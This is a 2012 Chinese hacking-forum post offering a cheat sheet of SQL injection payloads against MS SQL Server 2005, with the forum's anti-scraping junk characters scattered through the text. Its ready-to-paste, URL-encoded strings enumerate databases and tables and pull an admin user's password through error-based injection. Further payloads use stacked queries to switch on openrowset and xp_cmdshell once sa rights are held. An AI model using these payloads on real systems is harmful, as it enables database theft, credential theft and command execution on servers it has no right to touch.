找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2543|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
7 g; p' k5 v+ B$ ^0 Y- g, _

- [1 a+ l, E. \8 ]" }1 b. f8 t
/ I3 n5 R& o& |3 L. N[Copy to clipboard]CODE:# j, G, }( E9 g! V( i: k! C" I
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
1 j) X8 [: E4 E' j9 |; s. N) M% A. I0 G; ^
爆表语句,somedb部份是所要列的数据库,红色数字1累加
7 x4 O1 X' s2 `, D( I4 m& R' @' k6 e/ w8 M' ?7 A, F

; {2 Z* T% N# t8 \# T! V[Copy to clipboard]CODE:
$ Z$ C' O! o$ w) `6 \/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
) W# @$ c% R3 R
+ t& Q+ K' P6 B# V& X# W爆字段语句,爆表admin里user='icerover'的密码段6 S2 y8 l5 A1 s

3 V4 h- b. t9 Y) W' N( _8 m# Z8 s; e& c' S7 S# a6 K
[Copy to clipboard]CODE:) o# S! m' d2 p5 f4 D
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
/ V' o6 X$ D' u& N! d6 G1 q0 \; w9 G  f- G- S2 \( p3 N; ]$ \
mssql2005默认没有开xp_cmdshell的,openrowset也不能用- k# p% @! R' p4 H% V3 W
如果是sa权限,可以这样来开启
: M, X( K. N; a# U- R4 s7 w4 q1 e开启openrowset/ G; `7 O( M4 p7 M

; G% m% X1 v7 U' w* E
! H& L7 c# g1 ~& g7 L! G/ T9 V[Copy to clipboard]CODE:$ _7 B+ S. B) s0 F- f4 x/ W
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--" Y# @. Z, P' e+ X9 d( F4 q" t2 C0 F, w
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--6 U2 w9 i  O' ?5 y$ M, M
6 A- ]" A- d8 ], h
开启xp_cmdshell
8 D, T; N6 n5 n' p9 m" s5 P  {
* |; C2 P# g9 |- O  h
' A3 Q  Q; ^# X/ ^[Copy to clipboard]CODE:% _( p* _5 l$ S8 Q( W7 g
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
0 ]0 z" i( _* G# ~1 lEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--% G  r$ m4 q: s( V  \- u7 I5 P: G& F

+ V; `5 Q: b/ a, Tok,over~~晚安" u0 C/ \1 H9 ]; I' U2 o. r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表